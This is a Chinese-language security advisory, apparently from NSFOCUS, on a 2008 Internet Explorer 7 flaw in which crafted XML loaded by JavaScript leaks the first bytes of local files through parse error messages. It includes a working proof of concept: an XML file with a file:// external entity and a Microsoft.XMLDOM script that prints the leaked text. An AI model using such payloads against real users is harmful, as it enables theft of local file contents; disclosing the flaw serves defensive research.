安全研究

安全漏洞
Microsoft IE JavaScript及XML组合远程信息泄露漏洞

发布日期:2008-03-07
更新日期:2008-03-10

受影响系统:
Microsoft Internet Explorer 7.0
描述:
BUGTRAQ  ID: 28143

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE 7处理文件访问实现上存在漏洞,远程攻击者可能利用此漏洞获取敏感信息。

在IE 7中图形和iframe之类的HTML对象可以使用file:///主题来锁定文件,而通过file:///主题浏览C目录等相对路径没有受限,且file:///主题现在位于弹出框的shell中而不是浏览器中,使用的是绝对路径。如果用户访问了结合有Javascript和XML的恶意网页的话,就可能会触发精心设计的XML错误,回显的错误消息中可能会包含有远程文件的前几个字节。

<*来源:Ronald van den Heetkamp (hackerwebzine@gmail.com
  
  链接:http://www.0x000000.com/index.php?i=525&bin=1000001101
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE show [
<!ENTITY % name SYSTEM "file://localhost/FirefoxPortable/Data/profile/kf.txt">
%name;
]>
<show>
%name;
</show>



<script language="JavaScript">

    // load new XML document.
    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");

    function XML(file,list) {

        /*
        Available error messages:
        ------------------------
        :: parseError.errorCode
        :: parseError.reason
        :: parseError.line
        :: parseError.linePos
        :: parseError.srcText
        ------------------------
        */
        
        xmlDoc.async="false";
        xmlDoc.validateOnParse = "true";
        xmlDoc.onreadystatechange=chk;
        xmlDoc.load(file);
        
        if(list) {
        listXML(xmlDoc.documentElement)
        } else {
        document.write(xmlDoc.parseError.srcText);
        }
    
    }
    
    function chk() {  
        return (xmlDoc.readyState!=4) ? false:true;
    }

    function listXML(xmlsrc) {
        // for valid DTD files, list the complete tree
        if(xmlsrc.hasChildNodes()) {
        document.write('<ul><li>');
        document.write(xmlsrc.tagName +' => ');
        for(i = 0; i < xmlsrc.childNodes.length; ++i) {
            // recursive walk
            listXML(xmlsrc.childNodes(i));
        }
        document.write('</li></ul>');
        } else {
        document.write(xmlsrc.text);
        }
    }
    
    XML("MSIE7.xml");
    
</script>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:2767
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障